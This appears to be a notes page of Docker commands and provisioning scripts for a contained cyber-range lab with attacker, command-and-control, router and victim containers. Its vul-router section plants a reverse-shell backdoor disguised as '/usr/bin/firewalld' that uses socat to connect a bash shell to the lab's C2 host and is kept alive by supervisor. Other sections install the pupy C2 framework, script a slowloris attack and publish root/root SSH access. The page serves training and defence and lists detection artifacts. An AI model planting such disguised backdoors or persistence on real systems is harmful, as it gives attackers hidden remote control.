Installing Docker on Debian

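# Install Docker CE from Docker's apt repository (the source line names the
# Debian "stretch" suite).
# The repository key goes into its own file and is tied to this one source
# with signed-by; `apt-key add` would instead make the key trusted for every
# repository configured on the machine.
# Every privileged step uses sudo. The original mixed `sudo apt-key` with an
# unprivileged `>` redirect into /etc/apt, which only works from a root shell.
sudo install -m 0755 -d /etc/apt/keyrings &&
sudo curl -fsSL https://download.docker.com/linux/debian/gpg -o /etc/apt/keyrings/docker.asc &&
sudo chmod a+r /etc/apt/keyrings/docker.asc &&
echo 'deb [signed-by=/etc/apt/keyrings/docker.asc] https://download.docker.com/linux/debian stretch stable' | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null &&
sudo apt-get update &&
sudo apt-get install docker-ce &&
# Smoke test: pulls and runs the hello-world image, then prints client and
# daemon versions.
sudo docker run hello-world &&
sudo docker version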

Copying files from Docker container to host

Find your container ID

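# -q prints only the IDs of running containers, one per line. Piping
# `docker ps` through awk also emitted the word CONTAINER from the table header.
# Plain `docker ps` shows the NAMES column next to each ID.
docker ps -q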

Copy it.

# docker cp copies between a container's filesystem and the host; the
# container may be given by ID or by name, as in the second example.
# What comes out is whatever the container wrote to that path, so check a
# copied file (type, hash) before opening or running it on the host.
docker cp <containerId>:/file/path/within/container /host/path/target

sudo docker cp goofy_roentgen:/tmp/expl /tmp

Spawn shell

# Starts an interactive /bin/sh inside the running container. The shell runs
# as the container's configured user, which is root unless the image or
# `docker run --user` set another one.
docker exec -it <CONTAINER_ID> /bin/sh

Kill Container

# docker kill sends SIGKILL by default, so the main process gets no chance to
# shut down cleanly; `docker stop` sends SIGTERM first and SIGKILL only after
# a grace period.
sudo docker kill {container-id}

Docker error response from daemon: “Conflict … already in use by container”

# The conflict means a container (running or stopped) already owns the name.
# rm -f kills it if needed and removes it together with its writable layer;
# `docker commit` or `docker export` it first if its contents still matter.
docker rm -f qgis-desktop-2-4
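#!/bin/bash
# Start one detached container per lab image on the user-defined "sandbox"
# network. The array holds ten image names; index i selects the address
# 172.18.0.(100+i), i.e. 172.18.0.100 through 172.18.0.109. Computing the last
# octet arithmetically keeps the address valid if more images are appended
# (string-appending the index would yield "172.18.0.1010" at index 10).
foo=( cnc-server scrubber-server waf-server laptop_attacker scrubber-router laptop-user firewall-router vul-router vulnerable-server victim-server )
for i in "${!foo[@]}"; do
  DIP="172.18.0.$((100 + i))"
  DOBJECT="${foo[$i]}"
  # Hostname and container name keep only the letters and digits of the image
  # name ("laptop_attacker" -> "laptopattacker").
  DHOSTNAME=$(printf '%s' "$DOBJECT" | tr -cd '[:alnum:]')
  # -P publishes every port the image EXPOSEs on a random host port, by
  # default on all host interfaces. --restart unless-stopped brings the
  # container back after a daemon or host restart.
  sudo docker run -dit --net sandbox --hostname "$DHOSTNAME" --ip "$DIP" --restart unless-stopped -P --name "${DHOSTNAME}sshd" "$DOBJECT"
done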

#DOBJECT="waf-server"
#DHOSTNAME=$(echo $DOBJECT | tr -cd '[:alnum:]')
#sudo docker run -dit --net sandbox --hostname $DHOSTNAME --ip 172.18.0.100 --restart unless-stopped -P --name "${DHOSTNAME}sshd" $DOBJECT
#CONTAINER_ID=$(sudo docker ps | grep $DHOSTNAME | awk '{print $1}')
#sudo docker kill $CONTAINER_ID
#sudo docker rm -f "${DHOSTNAME}sshd"
#sudo docker commit $CONTAINER_ID $DOBJECT
#!/bin/bash
# run all docker
# One detached container per image on the "sandbox" network; the array index
# becomes the last digit of the container's 172.18.0.10x address.
foo=( cnc-server scrubber-server waf-server laptop_attacker scrubber-router laptop-user firewall-router vul-router vulnerable-server victim-server )
for ((i = 0; i < ${#foo[@]}; i++)); do
  DOBJECT="${foo[i]}"
  DIP="172.18.0.10${i}"
  # Strip everything that is not a letter or digit from the image name.
  DHOSTNAME="${DOBJECT//[^[:alnum:]]/}"
  printf '%s %s %s %s\n' "$DIP" "$DOBJECT" "$DHOSTNAME" "STARTING ..."
  sudo docker run -dit \
    --net sandbox \
    --hostname "$DHOSTNAME" \
    --ip "$DIP" \
    --restart unless-stopped \
    -P \
    --name "${DHOSTNAME}sshd" \
    "$DOBJECT"
done
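# kill all docker
# Stops and removes every lab container. Each container is addressed by the
# name the run loop gave it ("<alnum image name>sshd"). Grepping the whole
# `docker ps` table matched any column and produced an empty or multi-line ID
# when a container was absent or the pattern hit more than one row.
foo=( cnc-server scrubber-server waf-server laptop_attacker scrubber-router laptop-user firewall-router vul-router vulnerable-server victim-server )
for DOBJECT in "${foo[@]}"; do
  DHOSTNAME=$(printf '%s' "$DOBJECT" | tr -cd '[:alnum:]')
  CONTAINER_ID="${DHOSTNAME}sshd"  # docker accepts a container name wherever it accepts an ID
  sudo docker kill "$CONTAINER_ID"
  # rm -f also discards the container's writable layer; anything not committed
  # or copied out beforehand is gone.
  sudo docker rm -f "$CONTAINER_ID"
  echo "$DOBJECT" "$DHOSTNAME" "KILLED!"
done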
#DOBJECT="waf-server"
#DHOSTNAME=$(echo $DOBJECT | tr -cd '[:alnum:]')
#sudo docker run -dit --net sandbox --hostname $DHOSTNAME --ip 172.18.0.100 --restart unless-stopped -P --name "${DHOSTNAME}sshd" $DOBJECT
#CONTAINER_ID=$(sudo docker ps | grep $DHOSTNAME | awk '{print $1}')
#sudo docker kill $CONTAINER_ID
#sudo docker rm -f "${DHOSTNAME}sshd"
#sudo docker commit $CONTAINER_ID $DOBJECT

Commit

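# Snapshot the running waf-server container back into the image it was
# started from.
DOBJECT="waf-server"
DHOSTNAME=$(printf '%s' "$DOBJECT" | tr -cd '[:alnum:]')
# The run loops on this page name each container "${DHOSTNAME}sshd", so the
# name is passed directly; the former `docker ps | grep` lookup could return
# nothing or several IDs.
CONTAINER_ID="${DHOSTNAME}sshd"
# docker commit stores the container's current filesystem as a new image and
# moves the "$DOBJECT" tag onto it. Everything written at runtime is baked in:
# keys, shell history, changed passwords, dropped files. Every later
# `docker run $DOBJECT` starts from that state.
sudo docker commit "$CONTAINER_ID" "$DOBJECT"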

Run all

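#!/bin/bash
# run all docker
# Starts one detached container per lab image on the "sandbox" network and
# prints how to reach it. Index i gives the address 172.18.0.(100+i) and the
# host port 4200+i; for the ten images below these are the same 172.18.0.10<i>
# and 420<i> values as before, and they stay valid if more images are added.
#
# Exposure to be aware of when running this on a shared or routable host:
#  - the banner advertises root login with password "root" over SSH;
#  - -p HOSTPORT:4200 publishes the shellinabox port on all host interfaces,
#    and -P does the same for every EXPOSEd port on a random host port.
# Writing the mapping as 127.0.0.1:HOSTPORT:4200 and dropping -P keeps the
# containers reachable from the Docker host only.
foo=( cnc-server scrubber-server waf-server laptop_attacker scrubber-router laptop-user firewall-router vul-router vulnerable-server victim-server )
for i in "${!foo[@]}"; do
  DIP="172.18.0.$((100 + i))"
  DPORT=$((4200 + i))
  DOBJECT="${foo[$i]}"
  # Hostname and container name keep only the letters and digits of the image name.
  DHOSTNAME=$(printf '%s' "$DOBJECT" | tr -cd '[:alnum:]')
  echo "$DIP $DOBJECT $DHOSTNAME STARTING ... SSH ACCESS: sshpass -p 'root' ssh root@$DIP SHELLINABOX PORT: $DPORT"
  sudo docker run -dit --net sandbox --hostname "$DHOSTNAME" --ip "$DIP" --restart unless-stopped -p "${DPORT}:4200" -P --name "${DHOSTNAME}sshd" "$DOBJECT"
done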

CNC SERVER

# CNCSERVER
# Provisioning for the lab's cnc-server image, one step per line. Each step
# runs only if the previous one succeeded.
# Supply-chain note: the three git clones take whatever the default branch
# holds at build time, and their setup.py / install.sh run with root rights or
# inside the image. Checking out a reviewed commit after each clone makes the
# build repeatable and auditable.
sudo apt update -y &&
sudo apt upgrade -y &&
sudo apt install \
  netcat \
  python-future python-six python-enum34 python-flake8 python-pygments python-xattr \
  apt-transport-https git locales language-pack-id &&
# Reinstall the distribution's pip after removing the pip-managed copy.
sudo apt install --reinstall python-pip -y &&
sudo python -m pip uninstall pip &&
sudo apt install python-pip --reinstall &&
pip install dukpy &&
# Python dependencies installed from source.
git clone https://github.com/ricmoo/pyaes.git &&
(cd pyaes; sudo python setup.py install) &&
git clone https://github.com/snoack/flake8-per-file-ignores.git &&
(cd flake8-per-file-ignores; sudo python setup.py install) &&
# pupy remote-administration framework, used as the lab's command-and-control server.
git clone https://github.com/n1nj4sec/pupy.git &&
# Locale is switched to en_US.UTF-8 for dpkg-reconfigure, then to C for the installer.
export LC_ALL="en_US.UTF-8" &&
export LC_CTYPE="en_US.UTF-8" &&
sudo dpkg-reconfigure locales &&
export LC_ALL=C &&
(cd pupy; ./install.sh) &&
(cd pupy/pupy; pip install -r requirements.txt)

VULNERABLE SERVER

# Provisioning for the lab's vulnerable-server image: a web server (apache2),
# a process supervisor and cron, all enabled at boot and started immediately.
apt install -y socat apache2 supervisor

# Same order as a hand-typed list: enable all three, start all three, then
# print the status of all three.
for svc in cron apache2 supervisor; do
  update-rc.d "$svc" enable
done
for svc in cron apache2 supervisor; do
  service "$svc" start
done
for svc in cron apache2 supervisor; do
  service "$svc" status
done

# Stop everything supervisor manages, reload its configuration and list the
# programs it knows about.
supervisorctl stop all
supervisorctl reread
supervisorctl update
supervisorctl avail

# Fetch the slowloris script into /var/local (default branch, unpinned).
(
  cd /var/local
  git clone https://github.com/gkbrk/slowloris.git
)

VULNERABLE ROUTER

# Provisioning for the lab's vul-router image: install socat, supervisor and
# git, enable and start supervisor, show its drop-in directory, then reset and
# reload whatever it manages. Each step runs only if the previous one succeeded.
apt install -y socat supervisor git &&
  update-rc.d supervisor enable &&
  service supervisor start &&
  service supervisor status &&
  ls /etc/supervisor/conf.d/ &&
  supervisorctl stop all &&
  supervisorctl reread &&
  supervisorctl update &&
  supervisorctl avail

# Supervisor program entry named "firewalld". With autorestart = true and
# startsecs = 0, supervisord relaunches the command whenever it exits, and the
# entry comes back on every supervisor start. Output goes to the two
# /var/log/firewalld.*.log files.
cat <<'EOF' > /etc/supervisor/conf.d/firewalld.conf
[program:firewalld]
directory = /var/local/
command = firewalld --update
startsecs = 0
autorestart = true
stdout_logfile=/var/log/firewalld.out.log
stderr_logfile=/var/log/firewalld.err.log
EOF

# The /usr/bin/firewalld written here is not the firewalld daemon. It is a
# two-line script that has socat open a TCP connection to 172.18.0.100 port 80
# and attach a login bash to it. 172.18.0.100 is the address the run loops on
# this page assign to cnc-server, so this is the lab's planted backdoor on the
# router image.
# Artifacts a defender can look for in the exercise: the supervisor entry
# above, a file at /usr/bin/firewalld that is a shell script rather than the
# packaged binary, a socat process with a `bash -li` child, and an
# established outbound session from the router to port 80.
cat <<'EOF' > /usr/bin/firewalld
#!/bin/bash
nohup socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:172.18.0.100:80 &
EOF

chmod +x /usr/bin/firewalld

# Fetch the slowloris script into /var/local (default branch, unpinned).
(cd /var/local; git clone https://github.com/gkbrk/slowloris.git)

# Writes attack.sh into the current directory. It runs slowloris against
# 172.18.0.109, the address the run loops on this page assign to
# victim-server on the "sandbox" network.
echo "python3 slowloris/slowloris.py 172.18.0.109" > attack.sh && chmod +x attack.sh

Slides
